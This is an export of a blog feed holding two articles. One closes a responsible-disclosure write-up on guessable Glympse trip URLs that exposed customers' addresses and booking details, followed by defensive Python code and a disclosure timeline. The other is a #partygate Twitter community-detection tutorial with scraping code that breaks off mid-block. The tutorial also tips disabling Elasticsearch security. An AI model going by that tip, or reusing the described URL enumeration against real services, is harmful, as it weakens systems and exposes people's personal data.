      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/9b6e977f926b6982bedf0bb3409f3cfc/63ec5/potterybarn.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.45945945945946%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABcRAAAXEQHKJvM/AAAC5ElEQVQoz22TyW8cRRTG+z/jzCo4gODIOVIUwBxQFhASB8QhMSFiicQBEGAZ4wgSO1IQckQMeMyMp2d69i0z3T297z0z3T1j/ygPCHFISZ/qvVdVX7331SuJ/43BcEh/MCQIQxZZ/l98tTxjWZw+EUW+pFiuyPKcolgidbo9fty9w89373H5ylUuvfEmb21scP3GJtvbP3Dv/h4Dq8c0VZmEI/R4ghaPxayu4c8DbN9hkWfMihTJsQyatQoNucyw26TTkBn32/SaNTpKlUG3wYl+xNH0EWXjTxRHpmqVqOh/UNdKTN0JPW2IE4V4SYw0tGfcrdpsHw7Yky22fuvxoOGxX7P5pRWwLxsc6yfIgqTulHkcDxiFfWS9QtNoYLo6tmNgeyZ+6iJtlaY89WGZl24pPPexzPM36zy7WV3bz2zKvPiJzP12iV4ki+wqdHyFlqtQUf+iO5mgWlOSeYppadiBivSw7fH2Vof37vS5ttvj6m6Xa8J+V+DKTpfLO3UOhse0nTqyUaEiyj7SHnFilmkYfRSzi5OGWL5Hz+0iZeJlkvlijdmiEBD+IhPIidI5E3GgbdXom0NqepkT7XdGfp+RMeX9n5pc+r7GOzsdLn7b4LvSv4TxPCMVRO7cx0hNvHRBJGLJbM7UUtGsCY5tiQcYC6gkUcBEN7nwdWst1aufn8tV49avLaS8WK2z0ROdmntM1S7hxjHuLMJNA5G5WHNNNFMl9H2SJCUOfQbjMRtbLV77QuH1L5u8/Gmd2wc9pDSfo0bqWuihP6DlKIJAwwkjAiF2mhWkaYrr2YwNHT8I0Q2VvqZy4ZsmL9xUeOUzhadvVLn9cISkJxOOp4cYkS/EDXgsmjeIIzyRjSOEjmf/lO9GCWNTpzHqojqa6LmUrw41Ptirc/1Bn4/2Rxy0HKQ4FzcmY+I8Js5igsznXNfzr5SKRs2KQmAlNF4QCt8JPbyFQyT2cnZKtoo5PVuu7dPTFX8DbApUEJoTWMMAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pottery Barn&quot;
        title=&quot;Pottery Barn&quot;
        src=&quot;/static/9b6e977f926b6982bedf0bb3409f3cfc/fcda8/potterybarn.png&quot;
        srcset=&quot;/static/9b6e977f926b6982bedf0bb3409f3cfc/12f09/potterybarn.png 148w,
/static/9b6e977f926b6982bedf0bb3409f3cfc/e4a3f/potterybarn.png 295w,
/static/9b6e977f926b6982bedf0bb3409f3cfc/fcda8/potterybarn.png 590w,
/static/9b6e977f926b6982bedf0bb3409f3cfc/63ec5/potterybarn.png 812w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;Tru Green&lt;/h3&gt;
&lt;p&gt;Some of the URLs resolved to scheduled lawn maintenance jobs. The data that could be captured from the HTTP responses included addresses and the time of the scheduled work.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a8c60d5a82c72a3390768278ad935313/612f7/trugreen.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 63.51351351351351%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAABcRAAAXEQHKJvM/AAADJ0lEQVQ4y0WT209cVRTG51/zVWu0xktpNRHphTIz57bPdR+gLUYfTNRUY4IVlZKh1FpbBZ02SKPR1DIz0AqFopRaHEoFWmGIIw1V+nOd3QcfVvY+e+/zrW9931o57l1l57cv2Vk4T7UyxDvffkb5h0vUapOM12pUahUmr1apTU5Qlf1PlSpXJMarNRPVif/3WeSqs/2cuZTn4o+KN4YP88TgIQ72uLi2wvIUjlJ4vk2cFLFcm7ztUnAcio6ssneUi/Kzc1vOPXLvfV/nub4Z9g3M0TowS/70PP6bH+ApjzBJ8IIYP1LEWhHIGsaJfMe4QYgj4UcJSarlXO7jkNzx0d959v1pXj4xy57eGZ7/cB7r2OtEoSOPO/HDQMB8AY6wsySxR0exwKGOAh0Fi4JlC3PfJNKpMOz9rk7LiWlaP57m1b4pWk8KYM9bhP4rqNATVoF5nAFmEnR2dVG+8DVfXSxz7psRymOjnDn7hST2iRJhuNF8yOr6Pyze3WRppcnmA+jtO4ntuiS6jTAqyOP0Magf0H2sh2azyV/bW6w0/mSbf6nXF1GBa8rPbT1qMte4zs3GL8zcn2ZlZ4mPPv3EAGYZ46SdKC7KYy0G+KTdR6gvLbPeaLByb43m3w+4NjVl7gzg/OICo7UxRitjjFwe5vL1cd4+/i6uV0R3dhNpCQENonZxUbTSKbdu32GhMc+N5Rvcvb/BFWkpVwXyRgBLpRK25ROLAUmUFzMKRrdAnAwTLexSDgSv0RbuEh3b0F1H+PXWbdY21rmzusbqRoOJn6+Z1vKjiNypIQF08/JzKiakpsREHxTNUgHrohjmafGf5gX1FPuD3Rw96rC4/AdbDx+x2dxiewemZueEoScuiymlU6exHGlcHZo+CqIspFzdjictss/fzR61S9ZnyCtLEoXiaj/nh8/y+blhRsoX6B8oCfvs/+Qxw7zliE6JsPNEMy2XibgrE5LsZa96kheF3eHwgExEbMzJKnKcFiy7XXrSkYmxjSlhrMkNDg0KQyk5DgRImckw+smlFgMy0P3BS3KmTesEcWyqyfTVqciTyuiFiUQkpDT/AULnwH4wIvl/AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Tru Green&quot;
        title=&quot;Tru Green&quot;
        src=&quot;/static/a8c60d5a82c72a3390768278ad935313/fcda8/trugreen.png&quot;
        srcset=&quot;/static/a8c60d5a82c72a3390768278ad935313/12f09/trugreen.png 148w,
/static/a8c60d5a82c72a3390768278ad935313/e4a3f/trugreen.png 295w,
/static/a8c60d5a82c72a3390768278ad935313/fcda8/trugreen.png 590w,
/static/a8c60d5a82c72a3390768278ad935313/612f7/trugreen.png 773w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;Origin Energy&lt;/h3&gt;
&lt;p&gt;Times and locations of LPG pickups and exchanges were available. Customer numbers in the HTTP response could be used on the Origin website to request delivery rescheduling. I didn’t attempt to reschedule, but the cost of heating in the UK has gone up since I first came across this information at the end of 2021!&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a59065ca2a3b616ce2eed883637ee0e5/e1b7c/origin.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 67.56756756756756%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7CAAAOwgEVKEqAAAABTklEQVQ4y51UCY6DMAzkNf10X9FHleUKScgB4XI9KUEt3ZXKRpq6Ns7g2BOyuhFUVjUVZcm2IvhV3UQrWkmNEKS0Juc9WecYngxbY5/ojCXdmR1Zx8ld171Bg4A3pbWuKw3DQOMYKIRAy7Lsz7x3pJSMe7RSlCn+OUJKGQk9VwXfWEvjNDHhGDHxfwDEKQeEOEkWmQ9AAggBkCNmjInVwyJu+SV9378R6m8JYaetwnmeYwtQHewpwtfk1NsE+KcrxAYgVRe2HgJpMKcI0Sf4ONpxpdjpCp2zUSqQDfp3XF8RYhAp8X7PqShKqlj0QrR7zr+n3PCNkVLtcbwMPixIPwg/ha13qQC4BTHOsYgX8f9KaMx25SCFKAc8UDERfYOQsdHiLvN0LR8TvvnryHle0A/3CB+DBHwc2lbRgklugwi3G8nLhfrr9TnlLX4kfACNnTLoZSsfdAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Origin&quot;
        title=&quot;Origin&quot;
        src=&quot;/static/a59065ca2a3b616ce2eed883637ee0e5/fcda8/origin.png&quot;
        srcset=&quot;/static/a59065ca2a3b616ce2eed883637ee0e5/12f09/origin.png 148w,
/static/a59065ca2a3b616ce2eed883637ee0e5/e4a3f/origin.png 295w,
/static/a59065ca2a3b616ce2eed883637ee0e5/fcda8/origin.png 590w,
/static/a59065ca2a3b616ce2eed883637ee0e5/efc66/origin.png 885w,
/static/a59065ca2a3b616ce2eed883637ee0e5/c83ae/origin.png 1180w,
/static/a59065ca2a3b616ce2eed883637ee0e5/e1b7c/origin.png 1449w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;The Fix&lt;/h3&gt;
&lt;p&gt;I wouldn’t classify this as a bug or a security flaw, per se, but these were the recommendations I initially passed to Glympse when I privately disclosed it to them on 19th December 2021. They are also worth considering if you are involved in developing an app that shares information via a dynamically generated URL.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Consider more aggressive rate limiting and banning IP addresses which are querying multiple different trips. &lt;em&gt;Difficult when most mobile devices are behind CG-NAT.&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;If there isn’t a monitoring solution in place for the trips endpoint, consider using one. &lt;em&gt;Again, devices behind CG-NAT make identifying patterns of abuse more difficult.&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;To protect future URLs increase the URL suffix complexity by increasing the length and/or including upper/lower/special characters.&lt;/li&gt;
&lt;li&gt;Consider removing personally identifiable information from the front end as well as any other superfluous data.&lt;/li&gt;
&lt;/ol&gt;
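&lt;p&gt;To make the recommendations above more concrete, here is a minimal Python sketch of what they might look like on the server side. It is illustrative only and is not Glympse’s implementation. The names new_share_id, DistinctTripMonitor and public_view, along with the thresholds and field names, are all hypothetical. The sketch covers three measures. It uses the standard library’s secrets.token_urlsafe to generate unguessable IDs. A per-client sliding window counts distinct trip IDs rather than raw requests. Finally, an allow-list strips everything else (names, phone numbers, exact addresses) from the public trip view.&lt;/p&gt;

```python
import secrets
import time
from collections import defaultdict, deque
from typing import Optional


# Recommendation 3: long, random, URL-safe share IDs.
def new_share_id(nbytes: int = 16) -> str:
    """Return an unguessable share ID; 16 random bytes give 128 bits (22 URL-safe chars)."""
    return secrets.token_urlsafe(nbytes)


# Recommendations 1 and 2: watch for clients requesting many *different* trips.
class DistinctTripMonitor:
    """Flag clients that look up more than `max_distinct` different trip IDs per window.

    The client key might be an IP address, but many users can share one address
    behind CG-NAT, so the thresholds here are illustrative and would need tuning.
    """

    def __init__(self, max_distinct: int = 20, window_seconds: float = 60.0):
        self.max_distinct = max_distinct
        self.window_seconds = window_seconds
        self._events = defaultdict(deque)  # client -> deque of (timestamp, trip_id)

    def record(self, client: str, trip_id: str, now: Optional[float] = None) -> bool:
        """Record one lookup and return True if the client now looks like it is enumerating."""
        now = time.monotonic() if now is None else now
        events = self._events[client]
        events.append((now, trip_id))
        cutoff = now - self.window_seconds
        # Discard lookups older than the window (the deque is kept in time order).
        while events and cutoff >= events[0][0]:
            events.popleft()
        distinct_trips = {tid for _, tid in events}
        return len(distinct_trips) > self.max_distinct


# Recommendation 4: only expose an allow-list of fields to the public viewer.
PUBLIC_TRIP_FIELDS = {"eta", "route", "status"}  # hypothetical field names


def public_view(trip: dict) -> dict:
    """Return a copy of a trip record containing only allow-listed fields."""
    return {key: value for key, value in trip.items() if key in PUBLIC_TRIP_FIELDS}
```

&lt;p&gt;Counting distinct trip IDs rather than total requests is a deliberate choice. A viewer repeatedly refreshing a single trip is never flagged, while a script cycling through IDs is. Behind CG-NAT, however, many legitimate users viewing their own trips can share one client key, so the threshold needs care.&lt;/p&gt;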
&lt;h3&gt;Disclosure&lt;/h3&gt;
&lt;p&gt;I have been in contact with the Glympse team since December 2021, assisting them with their fix, and my attack is no longer possible thanks to improvements that Glympse have made! Some of you may think that the fix took a while to implement and that data was exposed for too long. However, I understand that Glympse has a relatively small team, and members of the C-Suite informed me that this fix was prioritised ahead of fee-earning activity.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dec 2021 — Research conducted and private disclosure made. &lt;/li&gt;
&lt;li&gt;Jan 2022 — Well-thought-out initial response from Glympse. There were also some other minor findings in the viewer data flow, including some publicly facing credentials in the browser app that were passed to the backend, but these were intended as placeholders and used for logging and monitoring purposes. Increasing the URL suffix complexity was described as a larger effort, primarily due to the variety of external integrations and backwards compatibility concerns. I also turned down an offer to sign an NDA, as it didn’t feel quite right before a fix was in place!&lt;/li&gt;
&lt;li&gt;Feb to Mar 2022 — Further discussions about rate limiting, CG-NAT, URL complexity, eliminating superfluous data and possibly password-protecting trips (an option Glympse decided against).&lt;/li&gt;
&lt;li&gt;Apr 2022 — Gentle nudge suggesting that &amp;#x3C; 3 months to apply a fix when personal information is publicly available is a benchmark to strive for.&lt;/li&gt;
&lt;li&gt;May to Jun 2022 — Glympse became a little non-responsive but I understand this was due to engineers and C-Suite holidays.&lt;/li&gt;
&lt;li&gt;Jul 2022 — Fix complete for individual users of the Glympse application. Glympse wanted to wait until a large portion of users had downloaded the latest version, because otherwise the fix would break the application.&lt;/li&gt;
&lt;li&gt;Aug 2022 — 80% of users were on the new version of the app and the update was pushed. The app now supported the newly introduced invite code (uppercase, lowercase, multiple hyphens and 9 characters long). Importantly, trips were now “live” for a shorter time and superfluous data had been minimised, which made my attack obsolete. There are also future plans to increase the length of the URL suffix in line with best practice.&lt;/li&gt;
&lt;li&gt;Aug to Nov 2022 - Further engineering work was needed to ensure the same fix was pushed to all of Glympse’s enterprise partners. There was an initial plan to publish this article on National Computer Security Day (Nov 30), but unfortunately Glympse needed more time.&lt;/li&gt;
&lt;li&gt;Jan 2023 - Fixes complete!&lt;/li&gt;
&lt;li&gt;Mar 2023 - Article published!&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Side note&lt;/h3&gt;
&lt;p&gt;Another ‘lesson learned’ from this exercise is the importance of supplier due diligence and how vulnerabilities can be introduced into an organisation’s infrastructure via a supplier. Glympse are SOC 2 Type 2 certified, which is one of the meatier information security accreditations. I have worked as a consultant helping organisations meet the standard and have conducted SOC 2 audits myself, and this goes to show that even the most thorough best practice is fallible. An accreditation can be demonstrative of &lt;em&gt;good&lt;/em&gt; practice (often at a point in time), but always strive to go above and beyond and consider vulnerabilities and security gaps that aren’t addressed by the frameworks you have adopted.&lt;/p&gt;
&lt;h3&gt;Kind Words&lt;/h3&gt;
&lt;p&gt;“Too many people in our industry use their research for their own personal gains,” said Brandon Rodgers, Senior Technical Architect, at Glympse. “We appreciate how thoughtful Dan was working with us to develop a solution that improves our platform for our customers.”&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Twitter users mentioning #partygate divided into communities based on language style]]></title><description><![CDATA[Background This is an implementation of the paper, “Message-based Community Detection on Twitter”, written by Carl Miller and associates at…]]></description><link>https://dfworks.com/blog/partygate/</link><guid isPermaLink="false">https://dfworks.com/blog/partygate/</guid><pubDate>Sun, 05 Jun 2022 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Background&lt;/h2&gt;
&lt;p&gt;This is an implementation of the &lt;a href=&quot;https://files.casmtechnology.com/message-based-community-detection-on-twitter.pdf&quot;&gt;paper&lt;/a&gt;, “Message-based Community Detection on Twitter”, written by Carl Miller and associates at &lt;a href=&quot;https://www.casmtechnology.com/&quot;&gt;CASM Technology.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Partygate is a political scandal in the United Kingdom concerning gatherings attended by government and Conservative Party staff during 2020 and 2021, at a time when COVID-19 public health restrictions prohibited most social gatherings. These gatherings fell outside what the restrictions permitted.&lt;/p&gt;
&lt;p&gt;Understandably, this was a divisive issue and was covered at length by the UK media. &lt;a href=&quot;https://yougov.co.uk/topics/politics/articles-reports/2021/12/08/vast-majority-britons-think-downing-street-party-d&quot;&gt;Opinion polling&lt;/a&gt; suggests that partygate was an important factor in declining public support for the Prime Minister, Boris Johnson, as well as for the Conservative Party more broadly.&lt;/p&gt;
&lt;p&gt;Using Twitter’s Search and Stream APIs, it was possible to collect a sizable database of tweets using the hashtag #partygate, along with the engagement they subsequently received. By analysing this data, we can better understand the nature of the accounts that were engaging with this hashtag, highlight any automated ‘bot’ or inauthentic activity and identify communities with similar thoughts and interpretations of the scandal.&lt;/p&gt;
&lt;p&gt;Traditional network analysis links entities based on follower activity and other engagement. It therefore reflects popularity on Twitter, with communities forming around influential accounts. This implementation instead links accounts based on the language each author uses, leveraging state-of-the-art natural language models capable of creating mathematical representations of text. These linguistic representations express similarities between accounts spatially, which allows communities to be identified and then characterised through a combination of quantitative and qualitative means. Communities based on language are more likely to include less popular accounts, which is important when trying to understand issues such as politics or elections.&lt;/p&gt;
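&lt;p&gt;To illustrate the general idea, the Python sketch below links authors whose language is similar and treats each connected group as a community. It is a simplified stand-in, not the method from the paper or the one used in this analysis. The approach described above uses state-of-the-art language models, whereas the sketch uses plain bag-of-words vectors and cosine similarity. It also uses connected components in place of a proper community detection algorithm. The 0.5 similarity threshold, the tokeniser and the sample texts are all assumptions for illustration.&lt;/p&gt;

```python
import math
import re
from collections import Counter


def vectorise(text: str) -> Counter:
    """Bag-of-words term counts: a crude stand-in for a language-model embedding."""
    return Counter(re.findall(r"[a-z#']+", text.lower()))


def cosine(a: Counter, b: Counter) -> float:
    """Cosine similarity between two sparse term-count vectors."""
    dot = sum(a[t] * b[t] for t in set(a).intersection(b))
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0


def language_communities(texts: dict[str, str], threshold: float = 0.5) -> list[set[str]]:
    """Link authors whose language is similar, then return connected groups as communities."""
    authors = list(texts)
    vectors = {name: vectorise(texts[name]) for name in authors}
    parent = {name: name for name in authors}  # union-find forest

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    # Add an edge (a union) for every pair of authors at or above the similarity threshold.
    for i, a in enumerate(authors):
        for b in authors[i + 1:]:
            if cosine(vectors[a], vectors[b]) >= threshold:
                parent[find(a)] = find(b)

    communities: dict[str, set[str]] = {}
    for name in authors:
        communities.setdefault(find(name), set()).add(name)
    return list(communities.values())


if __name__ == "__main__":
    sample = {
        "alice": "resign now #partygate rules for them not for us",
        "bob": "rules for them not for us, resign #partygate",
        "carol": "move on, cost of living matters more than #partygate",
        "dave": "cost of living matters more, time to move on",
    }
    print(sorted(sorted(c) for c in language_communities(sample)))
    # [['alice', 'bob'], ['carol', 'dave']]
```

&lt;p&gt;Swapping vectorise for a sentence-embedding model, and the connected-components step for a modularity-based algorithm, would bring the sketch closer to the approach described above. The overall shape stays the same: represent each author, connect similar authors, then group the resulting graph.&lt;/p&gt;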
&lt;h2&gt;Data Collection&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/medialab/gazouilloire&quot;&gt;Gazouilloire&lt;/a&gt; is a command line tool for long-term tweet collection from Twitter’s Stream and Search APIs, allowing large datasets to be created. With a local &lt;a href=&quot;https://www.elastic.co/downloads/elasticsearch#ga-release&quot;&gt;Elastic&lt;/a&gt; server running, Gazouilloire will start to build a database of tweets matching specific keywords or search terms (&lt;a href=&quot;https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-query-string-query.html#query-string-syntax&quot;&gt;Lucene query syntax&lt;/a&gt; can be used for more complex queries).&lt;/p&gt;
&lt;p&gt;Installation instructions can be found on the &lt;a href=&quot;https://github.com/medialab/gazouilloire&quot;&gt;GitHub&lt;/a&gt; page. You just need to make sure that you have Elasticsearch installed and a working set of &lt;a href=&quot;https://apps.twitter.com/app/&quot;&gt;Twitter API keys&lt;/a&gt; (the Twitter developer account needs elevated access for Gazouilloire to work).&lt;/p&gt;
&lt;blockquote&gt;
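&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: I initially struggled to get Gazouilloire to connect to Elastic; if you are experiencing similar problems, it is probably down to Elastic’s security settings. Gazouilloire connects over plain HTTP by default, while Elasticsearch 8.x enables security, including HTTPS, by default and so rejects non-HTTPS requests. Whilst not optimal from a security perspective, setting the relevant &lt;code class=&quot;language-text&quot;&gt;xpack.security&lt;/code&gt; options (for example &lt;code class=&quot;language-text&quot;&gt;xpack.security.enabled&lt;/code&gt;) to &lt;code class=&quot;language-text&quot;&gt;false&lt;/code&gt; in your &lt;code class=&quot;language-text&quot;&gt;elasticsearch.yml&lt;/code&gt; file will fix this.&lt;/p&gt;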
&lt;/blockquote&gt;
&lt;p&gt;Once installed, run &lt;code class=&quot;language-text&quot;&gt;gazou init&lt;/code&gt; to instantiate a project; this creates a config.json file for you to edit. Adding your Twitter credentials, Elastic database details and keywords is all that is required before you begin collecting data. I also set the &lt;code class=&quot;language-text&quot;&gt;grab_conversations&lt;/code&gt; option to &lt;code class=&quot;language-text&quot;&gt;true&lt;/code&gt; so that the tweets that collected tweets were replying to were also retrieved recursively.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
    &amp;quot;twitter&amp;quot;: {
        &amp;quot;key&amp;quot;: &amp;quot;xxxxxxxxxx&amp;quot;,
        &amp;quot;secret&amp;quot;: &amp;quot;xxxxxxxxxxxxxx&amp;quot;,
        &amp;quot;oauth_token&amp;quot;: &amp;quot;xxxxxxxxxxxxxx&amp;quot;,
        &amp;quot;oauth_secret&amp;quot;: &amp;quot;xxxxxxxxxxxxx&amp;quot;
    },
    &amp;quot;database&amp;quot;: {
        &amp;quot;host&amp;quot;: &amp;quot;localhost&amp;quot;,
        &amp;quot;port&amp;quot;: 9200,
        &amp;quot;db_name&amp;quot;: &amp;quot;partygate_full&amp;quot;,
        &amp;quot;multi_index&amp;quot;: false,
        &amp;quot;nb_past_months&amp;quot;: 0
    },
    &amp;quot;keywords&amp;quot;: [
        &amp;quot;#partygate&amp;quot;
    ],

    &amp;quot;url_pieces&amp;quot;: [],
    &amp;quot;time_limited_keywords&amp;quot;: {},
    &amp;quot;language&amp;quot;: null,
    &amp;quot;geolocation&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;resolve_redirected_links&amp;quot;: true,
    &amp;quot;resolving_delay&amp;quot;: 30,
    &amp;quot;grab_conversations&amp;quot;: true,
    &amp;quot;catchup_past_week&amp;quot;: true,
    &amp;quot;download_media&amp;quot;: {
        &amp;quot;photos&amp;quot;: false,
        &amp;quot;videos&amp;quot;: false,
        &amp;quot;animated_gifs&amp;quot;: false,
        &amp;quot;media_directory&amp;quot;: &amp;quot;media&amp;quot;
    },
    &amp;quot;timezone&amp;quot;: &amp;quot;Europe/Paris&amp;quot;,
    &amp;quot;verbose&amp;quot;: false
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Over the course of a day, ~350k tweets from 102,000 individual accounts were retrieved that mentioned, retweeted or otherwise engaged with a #partygate tweet.&lt;/p&gt;
&lt;p&gt;The Python library &lt;a href=&quot;https://eland.readthedocs.io/en/v8.1.0/&quot;&gt;eland&lt;/a&gt;, an Elasticsearch client with a pandas-like API, was used to retrieve the list of unique users from the database:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import eland as ed

# Connect to the local Elasticsearch server; the index name must match the one
# Gazouilloire created for your project
ed_tweets = ed.DataFrame(&amp;#39;http://localhost:9200&amp;#39;, &amp;#39;partygate_tweets&amp;#39;)
# Unique screen names of every account in the collected tweets
usernames = ed_tweets[&amp;#39;user_screen_name&amp;#39;].unique()&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To map accounts on the basis of similarities in the textual content of their tweets, it was important to analyse all of each account’s activity, not only the tweets referring to partygate. Collecting the most recent 200 tweets from the timelines of the 102,000 distinct users produced a dataset of at most 20,400,000 tweets (200 × 102,000).&lt;/p&gt;
&lt;p&gt;The most recent 200 tweets from each user’s timeline were collected by passing each username to the function below, which saves one CSV file per account. You will need to supply your own Twitter credentials; the script uses the &lt;code class=&quot;language-text&quot;&gt;csv&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;tweepy&lt;/code&gt; modules.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import csv
import tweepy

# Replace with your own Twitter API credentials
consumer_key = &amp;#39;xxxxxxxxxx&amp;#39;
consumer_secret = &amp;#39;xxxxxxxxxxxxxx&amp;#39;
access_key = &amp;#39;xxxxxxxxxxxxxx&amp;#39;
access_secret = &amp;#39;xxxxxxxxxxxxx&amp;#39;

# Authorise once and reuse the client; wait_on_rate_limit sleeps until the rate limit resets
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_key, access_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)

def get_all_tweets(screen_name):
    # Request the most recent tweets (200 is the maximum count per request)
    # Note: without tweet_mode=&amp;#39;extended&amp;#39;, tweet.text may be truncated
    new_tweets = api.user_timeline(screen_name=screen_name, count=200)

    # Transform the tweepy tweets into rows that will populate the CSV
    outtweets = [[tweet.id_str, tweet.created_at, tweet.text] for tweet in new_tweets]

    # Write one CSV per account; newline=&amp;#39;&amp;#39; stops the csv module adding blank lines on Windows
    with open(f&amp;#39;new_{screen_name}_tweets.csv&amp;#39;, &amp;#39;w&amp;#39;, newline=&amp;#39;&amp;#39;, encoding=&amp;quot;utf-8&amp;quot;) as f:
        writer = csv.writer(f)
        writer.writerow([&amp;quot;id&amp;quot;, &amp;quot;created_at&amp;quot;, &amp;quot;text&amp;quot;])
        writer.writerows(outtweets)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
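&lt;p&gt;In practice some of the ~102,000 accounts will be protected, suspended or deleted, and for those &lt;code class=&quot;language-text&quot;&gt;user_timeline&lt;/code&gt; typically raises an error that would stop a naive loop. The sketch below is a hypothetical driver (the names &lt;code class=&quot;language-text&quot;&gt;collect_timelines&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;skip_errors&lt;/code&gt; are illustrative, not part of tweepy) that calls a fetch function such as &lt;code class=&quot;language-text&quot;&gt;get_all_tweets&lt;/code&gt; for each username and records the ones that failed rather than aborting.&lt;/p&gt;

```python
from typing import Callable, Iterable, List, Tuple, Type


def collect_timelines(
    usernames: Iterable[str],
    fetch: Callable[[str], None],
    skip_errors: Tuple[Type[BaseException], ...] = (Exception,),
) -> List[str]:
    """Call fetch(name) for every username and return the names that raised an error.

    Hypothetical helper: fetch is assumed to behave like get_all_tweets,
    writing one CSV per account and returning nothing.
    """
    failed = []
    for name in usernames:
        try:
            fetch(name)
        except skip_errors:
            # Protected, suspended or deleted accounts end up here; keep going
            failed.append(name)
    return failed
```

&lt;p&gt;With tweepy 4.x, passing &lt;code class=&quot;language-text&quot;&gt;skip_errors=(tweepy.TweepyException,)&lt;/code&gt; limits the skipping to tweepy’s own errors, so genuine bugs in the script still surface.&lt;/p&gt;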
&lt;p&gt;To keep the dataset manageable, the analysis focused on the accounts that engaged most intensively with #partygate. Of the ~102,000 accounts, those that had mentioned or interacted with #partygate two times or fewer were removed, resulting in a dataset of 1,226,500 tweets authored by 4,906 users.&lt;/p&gt;
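&lt;p&gt;The interaction filter can be sketched with pandas. This assumes the collected #partygate tweets have been pulled into a pandas DataFrame (for example with eland’s &lt;code class=&quot;language-text&quot;&gt;eland_to_pandas&lt;/code&gt;) and that each row counts as one interaction by its &lt;code class=&quot;language-text&quot;&gt;user_screen_name&lt;/code&gt;; the helper name and the threshold parameter are hypothetical.&lt;/p&gt;

```python
import pandas as pd


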